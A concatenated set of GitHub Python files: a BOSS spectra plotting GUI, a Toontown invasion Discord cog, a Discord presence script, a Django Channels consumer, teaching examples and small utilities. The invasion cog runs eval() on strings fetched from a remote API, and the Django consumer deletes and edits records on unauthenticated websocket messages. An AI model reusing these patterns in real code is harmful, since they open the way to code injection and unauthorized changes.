split_str_into_newlines(text: str, font_path, font_size):\n font = ImageFont.truetype(font_path, font_size)\n words = text.split(\" \")\n return fit_words_within_width(words, font, True)\n\n\ndef split_with_joined_sentences(text: str):\n \"\"\"\n \"\"\"\n tokens = nlp(text)\n sentences = [sent.text.strip() for sent in tokens.sents]\n joined_sentences = []\n i = 0\n while i < len(sentences):\n sentence = sentences[i]\n if len(sentence) > 85: # Long sentences should be wrapped to multiple shorter lines\n text_chunks = [chunk for chunk in wrap(sentence, 85)]\n joined_sentences = [*joined_sentences, *text_chunks]\n i += 1\n else:\n if i + 1 < len(sentences) and len(f\"{sentence} {sentences[i+1]}\") <= 85: # Maybe we can join two different sentences\n joined_sentences.append(sentence + \" \" + sentences[i+1])\n i += 2\n else:\n joined_sentences.append(sentence)\n i += 1\n\n return joined_sentences","repo_name":"LuisMayo/objection_engine","sub_path":"objection_engine/font_tools.py","file_name":"font_tools.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"37"} +{"seq_id":"6374106461","text":"# GUI used for quickly plotting BOSS spectra. Also allows overplotting of best-fit template as\n# determined by redmonster pipeline. Sort of a redmonster version of plotspec.pro, though currently\n# with less bells and whistles.\n#\n# Tim Hutchinson, University of Utah, April 2014\n# Signifcantly updated by TH, October 2014\n#\n# thutchinson@utah.edu\n\nfrom os import environ\nfrom os.path import join, exists\ntry:\n from tkinter import *\nexcept ImportError:\n from Tkinter import *\nimport numpy as n\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, \\\nNavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom astropy.io import fits\nfrom astropy.convolution import convolve, Box1DKernel\nimport seaborn as sns\nsns.set_style('whitegrid')\n\nfrom redmonster.physics.misc import poly_array\n\n\nclass PlotFit(Frame):\n def __init__ (self):\n self.root = Tk()\n self.ablinelist = [\n 3890.2, 3933.7, 3968.5, 4102.9, 4307, 4341.7, 4862.7,\n 5175, 5889, 5895\n ]\n self.ablinenames = [\n r'H$\\epsilon$','Ca K', 'Ca H', r'H$\\delta$', 'Ca G',\n r'H$\\gamma$', r'H$\\beta$', 'Mg I', 'Na I', 'Na I'\n ]\n self.emlinelist = [2500]\n self.emlinenames = ['test emline']\n self.plate = None\n self.mjd = None\n #\n plate = StringVar()\n plate.set('7848')\n mjd = StringVar()\n mjd.set('56959')\n #\n L1 = Label(self.root, text='Plate')\n L1.grid(sticky=E)\n L2 = Label(self.root, text='MJD')\n L2.grid(sticky=E)\n L3 = Label(self.root, text='Fiber')\n L3.grid(stick=E)\n L5 = Label(self.root, text='z num')\n L5.grid(stick=E)\n self.e1 = Entry(self.root, textvariable=plate)\n self.e1.bind()\n self.e1.grid(row=0, column=1)\n self.e2 = Entry(self.root, textvariable=mjd)\n self.e2.grid(row=1, column=1)\n fiber = StringVar()\n fiber.set('0')\n self.e3 = Entry(self.root, textvariable=fiber)\n self.e3.grid(row=2, column=1)\n znum = StringVar()\n znum.set('1')\n self.e5 = Entry(self.root, textvariable=znum)\n self.e5.grid(row=3, column=1)\n nextz = Button(self.root, text='+', command=self.next_z)\n nextz.grid(row=3, column=4)\n prevz = Button(self.root, text='-', command=self.prev_z)\n prevz.grid(row=3, column=3)\n self.var = BooleanVar()\n self.var.set(1)\n self.restframe = BooleanVar()\n self.restframe.set(0)\n self.ablines = BooleanVar()\n self.ablines.set(0)\n self.emlines = BooleanVar()\n self.emlines.set(0)\n c = Checkbutton(self.root, text='Overplot best-fit model',\n variable=self.var)\n c.grid(row=4, column=1)\n restframe = Checkbutton(self.root, text='Rest-frame wavelength',\n variable=self.restframe)\n restframe.grid(row=5,column=1)\n ablines = Checkbutton(self.root, text='Show absorption lines ',\n variable=self.ablines)\n ablines.grid(row=6, column=1)\n emlines = Checkbutton(self.root, text='Show emission lines ',\n variable=self.emlines)\n emlines.grid(row=7, column=1)\n #\n smooth = StringVar()\n smooth.set('5')\n L4 = Label(self.root, text='Smooth')\n L4.grid(sticky=E)\n self.e4 = Entry(self.root, textvariable=smooth)\n self.e4.grid(row=8, column=1)\n plot = Button(self.root, text='Plot', command=self.do_plot)\n plot.grid(row=9, column=1)\n qbutton = Button(self.root, text='QUIT', fg='red',\n command=self.root.destroy)\n qbutton.grid(row=10, column=1)\n nextfiber = Button(self.root, text='>', command=self.next_fiber)\n nextfiber.grid(row=2, column=4)\n prevfiber = Button(self.root, text='<', command=self.prev_fiber)\n prevfiber.grid(row=2, column=3)\n Frame.__init__(self,self.root)\n self.root.mainloop()\n\n def do_plot(self):\n if self.plate != int(self.e1.get()) or self.mjd != int(self.e2.get()):\n self.plate = int(self.e1.get())\n self.mjd = int(self.e2.get())\n self.fiber = int(self.e3.get())\n self.znum = int(self.e5.get())\n self.platepath = join(environ['BOSS_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n 'spPlate-%s-%s.fits' % (self.plate, self.mjd))\n hdu = fits.open(self.platepath)\n self.specs = hdu[0].data\n self.wave = 10**(hdu[0].header['COEFF0'] +\n n.arange(hdu[0].header['NAXIS1']) *\n hdu[0].header['COEFF1'])\n self.models = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[2].data\n self.fiberid = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate,\n self.mjd)))[1].data.FIBERID\n self.type1 = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.CLASS1\n self.type2 = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.CLASS2\n self.type3 = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.CLASS3\n self.type4 = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.CLASS4\n self.type5 = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.CLASS5\n self.z = n.zeros((self.fiberid.shape[0],5))\n self.z[:,0] = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.Z1\n self.z[:,1] = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.Z2\n self.z[:,2] = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.Z3\n self.z[:,3] = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.Z4\n self.z[:,4] = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate, self.mjd)))[1].data.Z5\n self.zwarning = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n environ['RUN2D'], '%s' % self.plate,\n environ['RUN1D'],\n 'redmonster-%s-%s.fits' %\n (self.plate,\n self.mjd)))[1].data.ZWARNING\n else:\n self.fiber = int(self.e3.get())\n f = Figure(figsize=(10,6), dpi=100)\n a = f.add_subplot(111)\n loc = n.where(self.fiberid == self.fiber)[0]\n if self.znum == 1:\n z = self.z[loc[0],0]\n thistype = self.type1[loc[0]]\n elif self.znum == 2:\n z = self.z[loc[0],1]\n thistype = self.type2[loc[0]]\n elif self.znum == 3:\n z = self.z[loc[0],2]\n thistype = self.type3[loc[0]]\n elif self.znum == 4:\n z = self.z[loc[0],3]\n thistype = self.type4[loc[0]]\n elif self.znum == 5:\n z = self.z[loc[0],4]\n thistype = self.type5[loc[0]]\n if self.var.get() == 0:\n if self.restframe.get() == 0:\n a.plot(self.wave, self.specs[self.fiber], color='black')\n elif self.restframe.get() == 1:\n a.plot(self.wave/(1+self.z[loc][0]), self.specs[self.fiber],\n color='black')\n elif self.var.get() == 1:\n smooth = self.e4.get()\n if smooth is '':\n if self.restframe.get() == 0:\n a.plot(self.wave, self.specs[self.fiber], color='black')\n elif self.restframe.get() == 1:\n a.plot(self.wave/(1+z), self.specs[self.fiber],\n color='black')\n else:\n if self.restframe.get() == 0:\n a.plot(self.wave, convolve(self.specs[self.fiber],\n Box1DKernel(int(smooth))),\n color='black')\n elif self.restframe.get() == 1:\n a.plot(self.wave/(1+z), convolve(self.specs[self.fiber],\n Box1DKernel(int(smooth))),\n color='black')\n # Overplot model\n if len(loc) is not 0:\n if self.restframe.get() == 0:\n #a.plot(self.wave, self.models[loc[0]], color='black')\n # This for when multiple models are in redmonster file\n a.plot(self.wave, self.models[loc[0],self.znum-1],\n color='cyan')\n if self.ablines.get() == 1:\n for i, line in enumerate(self.ablinelist):\n if ((line*(1+z) > self.wave[0]) &\n (line*(1+z) < self.wave[-1])):\n a.axvline(line*(1+z), color='blue',\n linestyle='--',\n label=self.ablinenames[i])\n if self.emlines.get() == 1:\n for i, line in enumerate(self.emlinelist):\n if (line*(1+z) > self.wave[0]) & (line*(1+z) < \\\n self.wave[-1]):\n a.axvline(line*(1+z), color='red',\n linestyle='--',\n label=self.emlinenames[i])\n if self.ablines.get() == 1 or self.emlines.get() == 1:\n a.legend(prop={'size':10})\n elif self.restframe.get() == 1:\n a.plot(self.wave/(1+z), self.models[loc[0],self.znum-1],\n color='cyan')\n if self.ablines.get() == 1:\n for i, line in enumerate(self.ablinelist):\n if (line > self.wave[0]) & (line < self.wave[-1]):\n a.axvline(line, color='blue', linestyle='--',\n label=self.ablinenames[i])\n if self.emlines.get() == 1:\n for i, line in enumerate(self.emlinelist):\n if (line > self.wave[0]) & (line < self.wave[-1]):\n a.axvline(line, color='red', linestyle='--',\n label=self.emlinenames[i])\n if self.ablines.get() == 1 or self.emlines.get() == 1:\n a.legend(prop={'size':10})\n a.set_title('Plate %s Fiber %s: z=%s class=%s zwarning=%s' %\n (self.plate, self.fiber, z, thistype,\n self.zwarning[loc[0]]))\n else:\n print('Fiber %s is not in redmonster-%s-%s.fits' % \\\n (self.fiber, self.plate, self.mjd))\n a.set_title('Plate %s Fiber %s' % (self.plate, self.fiber))\n\n if self.restframe.get() == 1:\n lower_data, upper_data = self.set_limits()\n a.axis([self.wave[0]/(1+z)-100,self.wave[-1]/(1+z)+100,\n lower_data,upper_data])\n elif self.restframe.get() == 0:\n lower_data, upper_data = self.set_limits()\n a.axis([self.wave[0]-100,self.wave[-1]+100,lower_data,upper_data])\n a.set_xlabel('Wavelength ($\\AA$)')\n a.set_ylabel('Flux ($10^{-17} erg\\ cm^2 s^{-1} \\AA^{-1}$)')\n canvas = FigureCanvasTkAgg(f, master=self.root)\n canvas.get_tk_widget().grid(row=0, column=5, rowspan=20)\n toolbar_frame = Frame(self.root)\n toolbar_frame.grid(row=20,column=5)\n toolbar = NavigationToolbar2TkAgg( canvas, toolbar_frame )\n canvas.show()\n\n def next_fiber(self):\n self.fiber += 1\n self.e3.delete(0, END)\n self.e3.insert(0, str(self.fiber))\n self.do_plot()\n\n def prev_fiber(self):\n self.fiber -= 1\n self.e3.delete(0, END)\n self.e3.insert(0, str(self.fiber))\n self.do_plot()\n\n def next_z(self):\n if (self.znum >= 1) & (self.znum < 5):\n self.znum += 1\n self.e5.delete(0, END)\n self.e5.insert(0, str(self.znum))\n self.do_plot()\n else:\n if self.znum < 1:\n self.znum = 1\n self.e5.delete(0, END)\n self.e5.insert(0, str(self.znum))\n self.do_plot()\n elif self.znum >= 5:\n self.znum = 5\n self.e5.delete(0, END)\n self.e5.insert(0, str(self.znum))\n self.do_plot()\n else:\n self.znum = 1\n self.e5.delete(0, END)\n self.e5.insert(0, str(self.znum))\n self.do_plot()\n\n def prev_z(self):\n if (self.znum > 1) & (self.znum <= 5):\n self.znum -= 1\n self.e5.delete(0, END)\n self.e5.insert(0, str(self.znum))\n self.do_plot()\n else:\n if self.znum <= 1:\n self.znum = 1\n self.e5.delete(0, END)\n self.e5.insert(0, str(self.znum))\n self.do_plot()\n elif self.znum > 5:\n self.znum = 5\n self.e5.delete(0, END)\n self.e5.insert(0, str(self.znum))\n self.do_plot()\n else:\n self.znum = 1\n self.e5.delete(0, END)\n self.e5.insert(0, str(self.znum))\n self.do_plot()\n\n def set_limits(self, percentile=.95):\n sorted_flux = n.sort( self.specs[self.fiber] )\n bottom_ind = int(n.floor((1-percentile)/2. * sorted_flux.shape[0]))\n top_ind = n.ceil(sorted_flux.shape[0] - bottom_ind)\n return sorted_flux[bottom_ind], sorted_flux[top_ind]\n\n\n\napp = PlotFit()\n","repo_name":"timahutchinson/redmonster","sub_path":"python/redmonster/tools/plot_fits.py","file_name":"plot_fits.py","file_ext":"py","file_size_in_byte":17358,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38153734245","text":"# 1. build a submit function\nimport subprocess as sp\ndef submit(optns):\n sp.call([optns.program, \"-i\", optns.input_name, \"-o\", optns.output_name])\n\n# 2. build an options object\nfrom optavc.options import Options\noptions_kwargs = {\n 'template_file_path': \"template.dat\",\n 'energy_regex' : r\"@DF-RHF Final Energy:\\s+(-\\d+\\.\\d+)\",\n 'success_regex' : r\"\\*\\*\\* P[Ss][Ii]4 exiting successfully.\" ,\n 'program' : \"psi4\",\n 'input_name' : \"input.dat\",\n 'output_name' : \"output.dat\",\n 'submitter' : submit\n}\noptions_obj = Options(**options_kwargs)\n\nfrom optavc.template import TemplateFileProcessor\ntfp = TemplateFileProcessor(open(\"template.dat\").read(), options_obj)\n\nfrom optavc.hessian import Hessian\nimport numpy as np\nhessian_obj = Hessian(tfp.molecule, tfp.input_file_object, options_obj, path=\"HESS\")\nhessian_obj.compute_hessian()\nhess = hessian_obj.get_hessian()\nenrg = hessian_obj.get_reference_energy()\nprint(hess)\nprint(np.array(hess))\nprint(enrg)\n\n","repo_name":"mdav2/optavc","sub_path":"examples/hessian/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"40109980193","text":"# NOQA\nimport discord # NOQA\nfrom discord.ext import commands\nimport asyncio\nimport requests\nfrom datetime import datetime\n\nurl = 'http://www.toontownrewritten.com/api/invasions'\nloop = asyncio.get_event_loop()\n\n\nclass TTRInv:\n \"\"\"Check and follow cog invasions in Toontown Rewritten.\"\"\"\n\n def __init__(self, bot):\n \"\"\"Constructor.\"\"\"\n self.bot = bot\n loop.call_soon(self.refresh)\n\n def refresh(self):\n \"\"\"Re-request the invasion info.\"\"\"\n try:\n self.inv_json = requests.get(url)\n time = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')\n print(\"Invasions refreshed:\", time)\n except Exception as e:\n error_msg = \"Encountered {0} while attempting to refresh: {1}\"\n print(error_msg.format(type(e).__name__), e)\n\n # await asyncio.sleep(60)\n if self.bot.get_cog('TTRInv') is not None:\n loop.call_later(15, self.refresh)\n\n @commands.command()\n async def inv(self):\n \"\"\"Receive the latest invasion info from the Toon Platoon.\"\"\"\n self.inv_dict = self.inv_json.json()['invasions']\n invs = \"The Toon Platoon has reported these invasions:\\n\"\n for (key, val) in self.inv_dict.items():\n if int(val['progress'].split('/')[1]) % 1000 == 0:\n summoned = \"Summoned\"\n else:\n summoned = \"Natural\"\n percent = \"{0:.0%}\".format(eval(val['progress']))\n inv_prop = [key, val['type'], val['progress'], percent, summoned]\n invs += ((\" **{0[1]}** invasion in *{0[0]}*:\\n\"\n \" Progress: {0[3]} ({0[2]})\\n\"\n \" Origin: {0[4]}\\n\").format(inv_prop))\n await self.bot.say(invs)\n\n\ndef setup(bot):\n \"\"\"Setup function.\"\"\"\n bot.add_cog(TTRInv(bot))\n","repo_name":"Epicord/epicord-bot","sub_path":"cogs/ttrinv.py","file_name":"ttrinv.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"11994414985","text":"from pypresence import Presence\r\nimport sys\r\nimport codecs\r\nimport time\r\nimport random\r\nimport json\r\n\r\n##\r\n## Functions\r\n##\r\n\r\n#Open .cfg files\r\ndef cfg_open(file:str,name:str):\r\n\ttry:\r\n\t\tf = codecs.open(file, \"r\", \"utf-8\")\r\n\texcept:\r\n\t\terror(f\"The file could not be found: {file}\")\r\n\t\treturn\r\n\r\n\tfor line in f:\r\n\t\tif \" = \" in line:\r\n\t\t\tkey = line.split(\" = \")[0]\r\n\t\t\tvalue = line.split(\" = \")[1]\r\n\t\telif \"=\" in line:\r\n\t\t\tkey = line.split(\"=\")[0]\r\n\t\t\tvalue = line.split(\"=\")[1]\r\n\t\telse: key = \"__none__\"\r\n\t\t\r\n\t\tif key == name and key != \"__none__\":\r\n\t\t\treturn value.replace(\"\\n\",\"\").replace(\"\\r\",\"\")\r\n\t\r\n\terror(f'Failed to find the parameter named \\\"{name}\\\"')\r\n\treturn\r\n\r\n#Error function\r\ndef error(text:str=\"An unknown error has occurred!\"):\r\n\tprint(\"[!] \"+text)\r\n\tinput(\"Press any key to exit . . . \")\r\n\tsys.exit()\r\n\r\n\r\n\r\n##\r\n## Main code\r\n##\r\n\r\n#Get client id\r\ntry:\r\n\tclient_id = int(cfg_open('config.cfg','client_id'))\r\nexcept: error('Parameter \\\"client_id\\\" must be an integer!')\r\n\r\n#Get update rate\r\ntry:\r\n\tupdate_rate = int(cfg_open('config.cfg','update_rate'))\r\n\tif update_rate < 15: update_rate = 15\r\nexcept: error('Parameter \\\"update_rate\\\" must be an integer!')\r\n\r\n#Get statuses\r\nstatuses_file = cfg_open('config.cfg','statuses_file')\r\nstatus_name = cfg_open('config.cfg','status_name')\r\ntry:\r\n\tstatus_type = int(cfg_open('config.cfg','status_type'))\r\nexcept: error('Parameter \\\"status_type\\\" must be an integer!')\r\n\r\n\r\n#Connection attempt\r\ntry:\r\n\tRPC = Presence(client_id)\r\n\tRPC.connect()\r\nexcept:\r\n\terror(\"Failed to start RPC. There are 2 possible options:\\n 1. You have entered an incorrect Client ID.\\n 2. You forgot to open desktop Discord.\")\r\n\r\n\r\n#Print\r\nprint(\"\\n\" * 25)\r\nprint(f\"##########################################\")\r\nprint(f\"# #\")\r\nprint(f\"# AdvRPC v0.1.2 successfully started! #\")\r\nprint(f\"# Developer: @dasalex #\")\r\nprint(f\"# #\")\r\nprint(f\"##########################################\\n\\n\")\r\n\r\n\r\n#Update status function\r\ndef update_status():\r\n\t#Open file\r\n\ttry:\r\n\t\twith open(statuses_file, \"r\",encoding='utf-8') as f: statuses = json.load(f)\r\n\texcept: error(f\"Failed to open file: {statuses_file}\")\r\n\t\r\n\t#Get status from file\r\n\tif status_type == 1: status = statuses[random.choice(list(statuses.keys()))]\r\n\telif status_type == 2:\r\n\t\ttry: status = statuses[status_name]\r\n\t\texcept: error(f'The specified status could not be found \\\"{status_name}\\\"!')\r\n\telse: status = statuses[list(statuses.keys())[0]]\r\n\r\n\t#Large image\r\n\tif \"large_image\" in status:\r\n\t\tif status[\"large_image\"].lower() == \"none\": status[\"large_image\"] = None\r\n\telse: status[\"large_image\"] = None\r\n\r\n\t#Large text\r\n\tif \"large_text\" in status:\r\n\t\tif status[\"large_text\"].lower() == \"none\": status[\"large_text\"] = None\r\n\telse: status[\"large_text\"] = None\r\n\r\n\t#Small image\r\n\tif \"small_image\" in status:\r\n\t\tif status[\"small_image\"].lower() == \"none\": status[\"small_image\"] = None\r\n\telse: status[\"small_image\"] = None\r\n\r\n\t#Small text\r\n\tif \"small_text\" in status:\r\n\t\tif status[\"small_text\"].lower() == \"none\": status[\"small_text\"] = None\r\n\telse: status[\"small_text\"] = None\r\n\r\n\t#Buttons\r\n\tif \"buttons\" in status:\r\n\t\tif len(status[\"buttons\"]) < 1: status[\"buttons\"] = None\r\n\telse: status[\"buttons\"] = None\r\n\r\n\t#Timer\r\n\tif \"timer\" in status:\r\n\t\tif status[\"timer\"].lower() == \"true\": status[\"timer\"] = int(time.time())\r\n\t\telse: status[\"timer\"] = None\r\n\telse:\r\n\t\tstatus[\"timer\"] = None\r\n\tif status_type == 1:\r\n\t\tstatus[\"timer\"] = None\r\n\r\n\t#Update RPC Status\r\n\tRPC.update(\r\n\t\tdetails=status[\"details\"],\r\n\t\tstate=status[\"state\"],\r\n\t\tlarge_image=status[\"large_image\"],\r\n\t\tlarge_text=status[\"large_text\"],\r\n\t\tsmall_image=status[\"small_image\"],\r\n\t\tsmall_text=status[\"small_text\"],\r\n\t\tstart=status[\"timer\"],\r\n\t\tbuttons=status[\"buttons\"]\r\n\t)\r\n\r\n\r\n#Open statuses file\r\ntry:\r\n\twith open(statuses_file, \"r\",encoding='utf-8') as f: statuses = json.load(f)\r\nexcept: error(f\"Failed to open file: {statuses_file}\")\r\n\r\n#Get statuses\r\nif status_type == 1: status = statuses[random.choice(list(statuses.keys()))]\r\nelif status_type == 2:\r\n\ttry: status = statuses[status_name]\r\n\texcept: error(f'The specified status could not be found \\\"{status_name}\\\"!')\r\nelse: status = statuses[list(statuses.keys())[0]]\r\n\r\n#Update status\r\nif status_type != 1 and status[\"timer\"].lower() == \"true\":\r\n\tupdate_status()\r\n\twhile True:\r\n\t\ttime.sleep(update_rate)\r\nelse:\r\n\twhile True:\r\n\t\tupdate_status()\r\n\t\ttime.sleep(update_rate)","repo_name":"dasalexua/advrpc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5896195683","text":"from DAL.Models.book import Book\nfrom DAL import book_services\n\ndef get_all_books():\n books = []\n db_call = book_services.get_all_books_db()\n for x in db_call:\n books.append(Book(title=x[1], author=x[2], description=x[3], read=x[4], id=x[0]))\n return books\n\ndef add_new_book(title, author, description, read):\n book = Book(title=title, author=author, description=description, read=read)\n book_services.add_book_db(book)\n\ndef search_book_id(book_id):\n db_call = book_services.search_book_id_db(book_id)\n book = Book(title=db_call[1], author=db_call[2], description=db_call[3],id=db_call[0], read=db_call[4])\n return book\n\ndef update_book(book_id, new_title=None, new_author=None, new_description=None, new_read=None):\n db_call = book_services.update_book_db(book_id, new_title, new_author, new_description, new_read)\n return Book(title=db_call[1], author=db_call[2], description=db_call[3],read=db_call[4] ,id=db_call[0])\n\ndef search_books_keyword(keyword):\n books =[]\n db_call = book_services.search_books_keyword_db(keyword)\n for x in db_call:\n books.append(Book(title=x[1], author=x[2], description=x[3],read=x[4], id=x[0]))\n return books\n\ndef get_all_read_books():\n books = []\n db_call = book_services.get_all_read_books_db()\n for x in db_call:\n books.append(Book(title=x[1], author=x[2], description=x[3],read=x[4],id=x[0]))\n return books\n\n\n \n\n\n\n\n","repo_name":"imlocle/library","sub_path":"BLL/book_controller.py","file_name":"book_controller.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17875392444","text":"import re\nimport datetime\nimport json\nfrom channels import Group\nfrom channels.sessions import channel_session\n\n\nfrom .models import User\nfrom .models import Message\nfrom .models import Trainer\nfrom .models import Admin\n\ndef datetime_handler(x):\n if isinstance(x, datetime.datetime):\n return x.isoformat()\n raise TypeError(\"Unknown type\")\n\n\n@channel_session\ndef ws_connect(message):\n print(\"WS_CONNECT\")\n Group('admin', channel_layer=message.channel_layer).add(message.reply_channel)\n Group('admin', channel_layer=message.channel_layer).send({'text': json.dumps(getAppState(), default = datetime_handler)})\n\n\n@channel_session\ndef ws_receive(message):\n\t# print(\"WS_RECEIVE\")\n\tdata = json.loads(message['text'])\n\tif data['type'] == \"sms\": # слишком много \"сообщений\". сообщения от тренера пользователю будем называть sms-ками\n\t\tm = Message()\n\t\tm.send_message(data['sender'], data['receiver'], data['text'])\n\n\tif data['type'] == \"change_trainer\":\n\t\tuser_id = data['user_id']\n\t\ttrainer_id = data['trainer_id']\n\t\tuser = User.objects.get(user_id = user_id)\n\t\tuser.trainer_id = trainer_id\n\t\tuser.save()\n\n\tif data['type'] == \"change_trainer_status\":\n\t\ttrainer = Trainer.objects.get(id = data['trainer_id'])\n\t\ttrainer.active = data['trainer_status']\n\t\ttrainer.save()\n\n\tif data['type'] == 'remove_trainer':\n\t\ttrainer = Trainer.objects.get(id = data['trainer_id'])\n\t\ttrainer.delete()\n\t\tadmin = Admin.objects.get(id = data['trainer_id'])\n\t\tadmin.delete()\n\n\tif data['type'] == 'change_user_status':\n\t\tuser = User.objects.get(user_id = data['user_id'])\n\t\tuser.archive = bool(data['user_status'])\n\t\tuser.save()\n\n\n\n\tGroup('admin', channel_layer=message.channel_layer).send({'text':json.dumps(getAppState(), default = datetime_handler)})\n\n\n@channel_session\ndef ws_disconnect(message):\n\tprint(\"WS_DISCONNECT\")\n\n\ndef getAppState():\n\tresponse = []\n\titem = dict()\n\titem['type'] = 'trainers'\n\titem['data'] = [t for t in Trainer.objects.values()]\n\tresponse.append(item)\n\titem = dict()\n\titem['type'] = 'sms'\n\titem['data'] = [sms for sms in Message.objects.values()]\n\tresponse.append(item)\n\titem = dict()\n\titem['type'] = 'userlist'\n\titem['data'] = [u for u in User.objects.values()]\n\tresponse.append(item)\n\treturn response","repo_name":"alexey-kott/one_fit_chat_bot","sub_path":"bot/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1316667208","text":"# functions can take arguments positionally or as keywords\r\ndef fn(x, y): # here the arguments are positional, x comes before y\r\n ''' raise the first argument to the power of the second argument'''\r\n return x**y\r\n\r\n# here is a function that only expects positional arguments\r\ndef postitionalArg( *args ): # the asterisk tells python to expect positional arguments\r\n print(type(args), args) # the positional arguments exist in a tuple\r\n # we can act differently depending on how many arguments\r\n if len(args) == 0:\r\n print('function called with no arguments')\r\n elif len(args)==1:\r\n print('function called with a single argument')\r\n else:\r\n print('more than one argument passed in')\r\n\r\ndef keywordArgs( **kwargs ): # the double-asterisk indicates we expect keyword arguments\r\n print(type(kwargs)) # the keyword arguments are gathered into a dictionary\r\n for (k, v) in kwargs.items():\r\n print(k, v)\r\n\r\nif __name__ == '__main__':\r\n result = fn(y=2,x=3) # here we pass the arguments as keywords (not positional)\r\n print(result)\r\n # exercise the positional arguments function\r\n postitionalArg()\r\n postitionalArg(3)\r\n postitionalArg(3, 2, 1, True, [], (), {})# we can pass as many or few positonal arguments as we like\r\n # exercise the keyword-arguments function\r\n keywordArgs(x=1)# a single keyword argument\r\n keywordArgs(y=2, z= True) # two keyword arguments\r\n keywordArgs(a=(5,4,3)) # a single keyword argument\r\n","repo_name":"onionmccabbage/pythonIntroSept22","sub_path":"arg_kwarg.py","file_name":"arg_kwarg.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43058489351","text":"'''client program'''\nfrom threading import Thread\nimport socket\n\n'''reciver func for recieving responce from server '''\ndef receiver(server):\n data = b''\n while True:\n try:\n data = server.recv(1024)\n except:\n break\n if data:\n print('server response: '+str(data.decode()))\n else:\n break\n \n\nhost = '127.0.0.1'\nport = 5000\ns = socket.socket()\ns.connect((host, port))\n\n'''func to take input from user '''\ndef main():\n message = input('-->')\n while message != 'x':\n s.send(message.encode())\n message = input()\n s.close()\n\n\nif __name__ == '__main__':\n #main thread to take user input\n t= Thread(target=main)\n #thread to recive responce\n t2=Thread(target=receiver,args=(s,))\n t.start()\n t2.start()\n t.join()\n t2.join()\n","repo_name":"mohithpothineni/CNF","sub_path":"m9/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30980418939","text":"def solution(n, arr1, arr2):\n answer = []\n for l1, l2 in zip(arr1, arr2):\n str = \"\"\n for i in range(n):\n if(l1 % 2 == 1 or l2 % 2 == 1):\n str += \"#\"\n else:\n str += \" \"\n l1 = l1 // 2\n l2 = l2 // 2\n answer.append(str[::-1])\n return answer\n\ndef solution2(n, arr1, arr2):\n answer = []\n for i,j in zip(arr1,arr2):\n a12 = str(bin(i|j)[2:])\n a12=a12.rjust(n,'0')\n a12=a12.replace('1','#')\n a12=a12.replace('0',' ')\n answer.append(a12)\n return answer\n\nn = 5\narr1 = [9, 20, 28, 18, 11]\narr2 = [30, 1, 21, 17, 28]\nresult = solution(n, arr1, arr2)\nfor i in result:\n 